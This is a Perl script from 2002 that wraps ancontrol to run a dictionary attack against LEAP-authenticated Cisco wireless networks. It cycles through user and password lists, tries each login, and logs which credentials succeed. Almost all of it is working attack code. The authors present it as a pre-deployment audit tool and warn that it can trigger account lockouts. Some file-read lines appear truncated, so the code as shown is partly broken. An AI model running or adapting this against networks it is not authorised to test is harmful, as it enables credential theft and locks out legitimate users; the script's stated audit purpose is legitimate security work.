#!/usr/bin/perl # # Version 0.1 # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary # attack tool against LEAP enabled Cisco Wireless Networks. Traverses # a user list and password list attempting authentication and logging the # results to a file. Really wrecks havoc on RADIUS calls to NT Networks that # have lockout policies in place, you have been warned. Tweak the Timeouts, # a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon. # This tool was designed to audit authentication strengths before deploying LEAP in # a production environment. # # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away. # Tested on FreeBSD 4.7. # # General Usage : $0 # # Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org > # November 2K02 # # http://www.modelm.org/anwrap/ # use Expect (); if ($#ARGV<0) { &usage; } #setup some stuff $userfile =$ARGV[0]; $passfile=$ARGV[1]; $logfile = $ARGV[2]; $date =`date`; open(GAR, $passfile) or die "can't open password file, $passfile"; @GAR= ; open(USER, "<$userfile") or die; @users = ; close(USER); open(FILE, ">>$logfile"); print FILE "\n\nScript started at $date \n\n"; close(FILE); foreach $user (@users) { chop($user); $auth_success = "no"; $end_of_passwords = "no"; $i = 0; while ($auth_success eq "no" && $end_of_passwords eq "no") { $pass = $GAR[$i]; chop($pass); local $/; $p = Expect->spawn('ancontrol -L '.$user); $p->expect(5, "assw") || die "Never recieved LEAP password"; print $p "$pass\r"; print $pass,"\n"; if ($p->expect(10, "uth")) { print "Success!\n"; open(FILE, ">>$logfile") or die; print FILE "User: $user Password: $pass SUCCESS! ", "\n"; close(FILE); $auth_success = "yes"; } else { print "Failed\n"; open(FILE, ">>$logfile") or die; print FILE "User: $user Password: $pass FAILED! ", "\n"; close(FILE); } $p->close(); if ($i == $#GAR) { $end_of_passwords = "yes"; } else { $i++; } } } sub usage { print "\nUsage : $0 \n\n"; print "Ron Sweeney \n"; print "Brian Barto \n\n\n\n"; exit; }